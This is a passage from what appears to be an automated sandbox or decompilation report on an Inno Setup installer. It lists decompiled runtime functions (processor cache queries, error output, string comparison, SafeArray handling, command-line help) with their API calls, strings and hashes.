                                                                                     							_push(E004064D9);
                                                                                     							return E0040540C(_v12);   // finally: release the buffer (likely Delphi FreeMem)
                                                                                     						} else {
                                                                                     							// Each record is 0x18 bytes (32-bit SYSTEM_LOGICAL_PROCESSOR_INFORMATION):
                                                                                     							// +4 Relationship (2 = RelationCache), +8 Cache.Level, +0xa Cache.LineSize.
                                                                                     							// Note the loop trusts _v16 to be a multiple of 0x18; it never checks.
                                                                                     							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
                                                                                     								_t29 = _t29 + 0x18;
                                                                                     								_v16 = _v16 - 0x18;
                                                                                     								if(_v16 > 0) {
                                                                                     									continue;
                                                                                     								} else {
                                                                                     									goto L8;
                                                                                     								}
                                                                                     								goto L12;
                                                                                     							}
                                                                                     							_v8 =  *(_t29 + 0xa) & 0x0000ffff;   // found the level-1 cache record: take its LineSize
                                                                                     							E00407210();   // run the finally block (frees _v12) before returning
                                                                                     							L11:
                                                                                     							return _v8;
                                                                                     						}
                                                                                     					}
                                                                                     				}
                                                                                     				L12:
                                                                                     			}
                                                                                    0x00406425
                                                                                    0x00406427
                                                                                    0x0040642c
                                                                                    0x00406446
                                                                                    0x004064d9
                                                                                    0x004064d9
                                                                                    0x00000000
                                                                                    0x0040644c
                                                                                    0x0040644c
                                                                                    0x0040644f
                                                                                    0x00406450
                                                                                    0x00406452
                                                                                    0x00406459
                                                                                    0x00000000
                                                                                    0x00406465
                                                                                    0x0040646d
                                                                                    0x00406472
                                                                                    0x00406473
                                                                                    0x00406478
                                                                                    0x0040647b
                                                                                    0x00406481
                                                                                    0x00406485
                                                                                    0x00406486
                                                                                    0x0040648b
                                                                                    0x00406492
                                                                                    0x004064bc
                                                                                    0x004064be
                                                                                    0x004064c1
                                                                                    0x004064c4
                                                                                    0x004064d1
                                                                                    0x00406494
                                                                                    0x00406494
                                                                                    0x004064af
                                                                                    0x004064b2
                                                                                    0x004064ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064ba
                                                                                    0x004064a5
                                                                                    0x004064a8
                                                                                    0x004064e0
                                                                                    0x004064e6
                                                                                    0x004064e6
                                                                                    0x00406492
                                                                                    0x00406459
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                                                    • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                    • API String ID: 4275029093-79381301
                                                                                    • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                    • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                                                    • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                    • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 43%
                                                                                    			E004076B8(void* __ecx) {
                                                                                    				long _v4;
                                                                                    				void* _t3;
                                                                                    				void* _t9;
                                                                                    
                                                                                    				if( *0x4bb058 == 0) {
                                                                                    					if( *0x4b7032 == 0) {
                                                                                    						_push(0);
                                                                                    						_push("Error");
                                                                                    						_push("Runtime error     at 00000000");
                                                                                    						_push(0);
                                                                                    						L00403780();
                                                                                    					}
                                                                                    					return _t3;
                                                                                    				} else {
                                                                                    					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
                                                                                    						 *0x4bb35c();
                                                                                    					}
                                                                                    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
                                                                                    					_t9 = E00408240(0x40774c);
                                                                                    					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
                                                                                    				}
                                                                                    			}
                                                                                    0x004076c0
                                                                                    0x00407726
                                                                                    0x00407728
                                                                                    0x0040772a
                                                                                    0x0040772f
                                                                                    0x00407734
                                                                                    0x00407736
                                                                                    0x00407736
                                                                                    0x0040773c
                                                                                    0x004076c2
                                                                                    0x004076cb
                                                                                    0x004076db
                                                                                    0x004076db
                                                                                    0x004076f7
                                                                                    0x0040770a
                                                                                    0x0040771e
                                                                                    0x0040771e

                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                    • API String ID: 3320372497-2970929446
                                                                                    • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                    • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                                                    • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                    • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00420524(void* __ebx, void* __esi) {
                                                                                    				intOrPtr _t4;
                                                                                    				intOrPtr _t6;
                                                                                    
                                                                                    				if(E0041FF68(6, 0) == 0) {
                                                                                    					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
                                                                                    					 *0x4be914 = _t4;
                                                                                    					 *0x4be910 = E00420428;
                                                                                    					return _t4;
                                                                                    				} else {
                                                                                    					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
                                                                                    					 *0x4be910 = _t6;
                                                                                    					return _t6;
                                                                                    				}
                                                                                    			}
                                                                                    0x00420532
                                                                                    0x0042055f
                                                                                    0x00420564
                                                                                    0x00420569
                                                                                    0x00420573
                                                                                    0x00420534
                                                                                    0x00420544
                                                                                    0x00420549
                                                                                    0x0042054e
                                                                                    0x0042054e

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                    • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                                                    • API String ID: 1883125708-3870080525
                                                                                    • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                    • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                                                    • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                    • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
                                                                                    				char _v260;
                                                                                    				char _v768;
                                                                                    				char _v772;
                                                                                    				short* _v776;
                                                                                    				intOrPtr _v780;
                                                                                    				char _v784;
                                                                                    				signed int _v788;
                                                                                    				signed short* _v792;
                                                                                    				char _v796;
                                                                                    				char _v800;
                                                                                    				intOrPtr* _v804;
                                                                                    				signed short* _v808;
                                                                                    				void* __ebp;
                                                                                    				signed char _t55;
                                                                                    				signed int _t64;
                                                                                    				void* _t72;
                                                                                    				intOrPtr* _t83;
                                                                                    				void* _t103;
                                                                                    				void* _t105;
                                                                                    				void* _t108;
                                                                                    				void* _t109;
                                                                                    				intOrPtr* _t118;
                                                                                    				void* _t122;
                                                                                    				intOrPtr _t123;
                                                                                    				char* _t124;
                                                                                    				void* _t125;
                                                                                    
                                                                                    				_t110 = __ecx;
                                                                                    				_v780 = __ecx;
                                                                                    				_v808 = __edx;
                                                                                    				_v776 = __eax;
                                                                                    				if((_v808[0] & 0x00000020) == 0) {
                                                                                    					E00428FDC(0x80070057);
                                                                                    				}
                                                                                    				_t55 =  *_v808 & 0x0000ffff;
                                                                                    				if((_t55 & 0x00000fff) != 0xc) {
                                                                                    					_push(_v808);
                                                                                    					_push(_v776);
                                                                                    					L00427254();
                                                                                    					return E00428FDC(_v776);
                                                                                    				} else {
                                                                                    					if((_t55 & 0x00000040) == 0) {
                                                                                    						_v792 = _v808[4];
                                                                                    					} else {
                                                                                    						_v792 =  *(_v808[4]);
                                                                                    					}
                                                                                    					_v788 =  *_v792 & 0x0000ffff;
                                                                                    					_t103 = _v788 - 1;
                                                                                    					if(_t103 < 0) {
                                                                                    						L9:
                                                                                    						_push( &_v772);
                                                                                    						_t64 = _v788;
                                                                                    						_push(_t64);
                                                                                    						_push(0xc);
                                                                                    						L00427828();
                                                                                    						_t123 = _t64;
                                                                                    						if(_t123 == 0) {
                                                                                    							E00428D34(_t110);
                                                                                    						}
                                                                                    						E00429278(_v776);
                                                                                    						 *_v776 = 0x200c;
                                                                                    						 *((intOrPtr*)(_v776 + 8)) = _t123;
                                                                                    						_t105 = _v788 - 1;
                                                                                    						if(_t105 < 0) {
                                                                                    							L14:
                                                                                    							_t107 = _v788 - 1;
                                                                                    							if(E00429294(_v788 - 1, _t125) != 0) {
                                                                                    								L00427840();
                                                                                    								E00428FDC(_v792);
                                                                                    								L00427840();
                                                                                    								E00428FDC( &_v260);
                                                                                    								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                                                    							}
                                                                                    							_t72 = E004292C4(_t107, _t125);
                                                                                    						} else {
                                                                                    							_t108 = _t105 + 1;
                                                                                    							_t83 =  &_v768;
                                                                                    							_t118 =  &_v260;
                                                                                    							do {
                                                                                    								 *_t118 =  *_t83;
                                                                                    								_t118 = _t118 + 4;
                                                                                    								_t83 = _t83 + 8;
                                                                                    								_t108 = _t108 - 1;
                                                                                    							} while (_t108 != 0);
                                                                                    							do {
                                                                                    								goto L14;
                                                                                    							} while (_t72 != 0);
                                                                                    							return _t72;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t109 = _t103 + 1;
                                                                                    						_t122 = 0;
                                                                                    						_t124 =  &_v772;
                                                                                    						do {
                                                                                    							_v804 = _t124;
                                                                                    							_push(_v804 + 4);
                                                                                    							_t23 = _t122 + 1; // 0x1
                                                                                    							_push(_v792);
                                                                                    							L00427830();
                                                                                    							E00428FDC(_v792);
                                                                                    							_push( &_v784);
                                                                                    							_t26 = _t122 + 1; // 0x1
                                                                                    							_push(_v792);
                                                                                    							L00427838();
                                                                                    							E00428FDC(_v792);
                                                                                    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                    							_t122 = _t122 + 1;
                                                                                    							_t124 = _t124 + 8;
                                                                                    							_t109 = _t109 - 1;
                                                                                    						} while (_t109 != 0);
                                                                                    						goto L9;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    0x0042931c
                                                                                    0x00429328
                                                                                    0x0042932e
                                                                                    0x00429334
                                                                                    0x00429344
                                                                                    0x0042934b
                                                                                    0x0042934b
                                                                                    0x00429356
                                                                                    0x00429364
                                                                                    0x004294ef
                                                                                    0x004294f6
                                                                                    0x004294f7
                                                                                    0x00000000
                                                                                    0x0042936a
                                                                                    0x0042936d
                                                                                    0x0042938b
                                                                                    0x0042936f
                                                                                    0x0042937a
                                                                                    0x0042937a
                                                                                    0x0042939a
                                                                                    0x004293a6
                                                                                    0x004293a9
                                                                                    0x00429416
                                                                                    0x0042941c
                                                                                    0x0042941d
                                                                                    0x00429423
                                                                                    0x00429424
                                                                                    0x00429426
                                                                                    0x0042942b
                                                                                    0x0042942f
                                                                                    0x00429431
                                                                                    0x00429431
                                                                                    0x0042943c
                                                                                    0x00429447
                                                                                    0x00429452
                                                                                    0x0042945b
                                                                                    0x0042945e
                                                                                    0x0042947a
                                                                                    0x00429481
                                                                                    0x0042948c
                                                                                    0x004294a3
                                                                                    0x004294a8
                                                                                    0x004294bc
                                                                                    0x004294c1
                                                                                    0x004294d4
                                                                                    0x004294d4
                                                                                    0x004294dd
                                                                                    0x00429460
                                                                                    0x00429460
                                                                                    0x00429461
                                                                                    0x00429467
                                                                                    0x0042946d
                                                                                    0x0042946f
                                                                                    0x00429471
                                                                                    0x00429474
                                                                                    0x00429477
                                                                                    0x00429477
                                                                                    0x0042947a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0042947a
                                                                                    0x004293ab
                                                                                    0x004293ab
                                                                                    0x004293ac
                                                                                    0x004293ae
                                                                                    0x004293b4
                                                                                    0x004293b6
                                                                                    0x004293c5
                                                                                    0x004293c6
                                                                                    0x004293d0
                                                                                    0x004293d1
                                                                                    0x004293d6
                                                                                    0x004293e1
                                                                                    0x004293e2
                                                                                    0x004293ec
                                                                                    0x004293ed
                                                                                    0x004293f2
                                                                                    0x0042940d
                                                                                    0x0042940f
                                                                                    0x00429410
                                                                                    0x00429413
                                                                                    0x00429413
                                                                                    0x00000000
                                                                                    0x004293b4
                                                                                    0x004293a9

                                                                                    APIs
                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                    • String ID:
                                                                                    • API String ID: 351091851-0
                                                                                    • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                    • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                                                    • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                    • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 34%
                                                                                    			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                    				char _v8;
                                                                                    				char _v12;
                                                                                    				void* _t24;
                                                                                    				intOrPtr _t28;
                                                                                    				void* _t31;
                                                                                    				void* _t32;
                                                                                    				intOrPtr _t35;
                                                                                    
                                                                                    				_t32 = __esi;
                                                                                    				_t31 = __edi;
                                                                                    				_push(0);
                                                                                    				_push(0);
                                                                                    				_t24 = __eax;
                                                                                    				_push(_t35);
                                                                                    				_push(0x4aface);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t35;
                                                                                    				if(( *0x4c1d61 & 0x00000001) == 0) {
                                                                                    					E00407A20( &_v8);
                                                                                    				} else {
                                                                                    					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
                                                                                    				}
                                                                                    				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
                                                                                    				_push(_v8);
                                                                                    				_push(_t24);
                                                                                    				_push(0x4b0f94);
                                                                                    				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
                                                                                    				E004087C4( &_v12, _t24, 5, _t31, _t32);
                                                                                    				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
                                                                                    				_pop(_t28);
                                                                                    				 *[fs:eax] = _t28;
                                                                                    				_push(E004AFAD5);
                                                                                    				return E00407A80( &_v12, 2);
                                                                                    			}

                                                                                    0x004afa44
                                                                                    0x004afa44
                                                                                    0x004afa47
                                                                                    0x004afa49
                                                                                    0x004afa4c
                                                                                    0x004afa50
                                                                                    0x004afa51
                                                                                    0x004afa56
                                                                                    0x004afa59
                                                                                    0x004afa63
                                                                                    0x004afa77
                                                                                    0x004afa65
                                                                                    0x004afa6d
                                                                                    0x004afa6d
                                                                                    0x004afa7c
                                                                                    0x004afa81
                                                                                    0x004afa84
                                                                                    0x004afa85
                                                                                    0x004afa8a
                                                                                    0x004afa97
                                                                                    0x004afaae
                                                                                    0x004afab5
                                                                                    0x004afab8
                                                                                    0x004afabb
                                                                                    0x004afacd

                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                                    Strings
                                                                                    • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                                                    • Setup, xrefs: 004AFA9E
                                                                                    • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                                                    • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Message
                                                                                    • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                                                    • API String ID: 2030045667-3391638011
                                                                                    • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                    • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                                                    • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                    • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 69%
                                                                                    			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                                                    				signed int _v8;
                                                                                    				signed char _v9;
                                                                                    				signed int _v12;
                                                                                    				signed int _v14;
                                                                                    				void* _v20;
                                                                                    				void* _v24;
                                                                                    				signed short* _v28;
                                                                                    				signed short* _v32;
                                                                                    				signed int _v48;
                                                                                    				void* __ebx;
                                                                                    				void* __ebp;
                                                                                    				signed int _t150;
                                                                                    				signed int _t272;
                                                                                    				intOrPtr _t328;
                                                                                    				intOrPtr _t331;
                                                                                    				intOrPtr _t339;
                                                                                    				intOrPtr _t347;
                                                                                    				intOrPtr _t355;
                                                                                    				void* _t360;
                                                                                    				void* _t362;
                                                                                    				intOrPtr _t363;
                                                                                    
                                                                                    				_t367 = __fp0;
                                                                                    				_t358 = __edi;
                                                                                    				_t360 = _t362;
                                                                                    				_t363 = _t362 + 0xffffffd4;
                                                                                    				_v8 = __ecx;
                                                                                    				_v32 = __edx;
                                                                                    				_v28 = __eax;
                                                                                    				_v9 = 1;
                                                                                    				_t272 =  *_v28 & 0x0000ffff;
                                                                                    				if((_t272 & 0x00000fff) >= 0x10f) {
                                                                                    					_t150 =  *_v32 & 0x0000ffff;
                                                                                    					if(_t150 != 0) {
                                                                                    						if(_t150 != 1) {
                                                                                    							if(E00430860(_t272,  &_v20) != 0) {
                                                                                    								_push( &_v14);
                                                                                    								_t273 =  *_v20;
                                                                                    								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
                                                                                    									_t275 =  *_v32 & 0x0000ffff;
                                                                                    									if(( *_v32 & 0xfff) >= 0x10f) {
                                                                                    										if(E00430860(_t275,  &_v24) != 0) {
                                                                                    											_push( &_v12);
                                                                                    											_t276 =  *_v24;
                                                                                    											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
                                                                                    												E00428BF0(0xb);
                                                                                    												goto L41;
                                                                                    											} else {
                                                                                    												if(( *_v28 & 0x0000ffff) == _v12) {
                                                                                    													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                    													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
                                                                                    													goto L41;
                                                                                    												} else {
                                                                                    													_push( &_v48);
                                                                                    													L00427244();
                                                                                    													_push(_t360);
                                                                                    													_push(0x42fdb0);
                                                                                    													_push( *[fs:eax]);
                                                                                    													 *[fs:eax] = _t363;
                                                                                    													_t289 = _v12 & 0x0000ffff;
                                                                                    													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
                                                                                    													if((_v48 & 0x0000ffff) != _v12) {
                                                                                    														E00428AF8(_t289);
                                                                                    													}
                                                                                    													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                    													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
                                                                                    													_pop(_t328);
                                                                                    													 *[fs:eax] = _t328;
                                                                                    													_push(0x42fde5);
                                                                                    													return E00429278( &_v48);
                                                                                    												}
                                                                                    											}
                                                                                    										} else {
                                                                                    											E00428BF0(0xb);
                                                                                    											goto L41;
                                                                                    										}
                                                                                    									} else {
                                                                                    										_push( &_v48);
                                                                                    										L00427244();
                                                                                    										_push(_t360);
                                                                                    										_push(0x42fcf7);
                                                                                    										_push( *[fs:eax]);
                                                                                    										 *[fs:eax] = _t363;
                                                                                    										_t294 =  *_v32 & 0x0000ffff;
                                                                                    										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
                                                                                    										if(( *_v32 & 0x0000ffff) != _v48) {
                                                                                    											E00428AF8(_t294);
                                                                                    										}
                                                                                    										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
                                                                                    										_pop(_t331);
                                                                                    										 *[fs:eax] = _t331;
                                                                                    										_push(0x42fde5);
                                                                                    										return E00429278( &_v48);
                                                                                    									}
                                                                                    								} else {
                                                                                    									if(( *_v32 & 0x0000ffff) == _v14) {
                                                                                    										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                    										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
                                                                                    										goto L41;
                                                                                    									} else {
                                                                                    										_push( &_v48);
                                                                                    										L00427244();
                                                                                    										_push(_t360);
                                                                                    										_push(0x42fc52);
                                                                                    										_push( *[fs:eax]);
                                                                                    										 *[fs:eax] = _t363;
                                                                                    										_t299 = _v14 & 0x0000ffff;
                                                                                    										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
                                                                                    										if((_v48 & 0x0000ffff) != _v14) {
                                                                                    											E00428AF8(_t299);
                                                                                    										}
                                                                                    										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
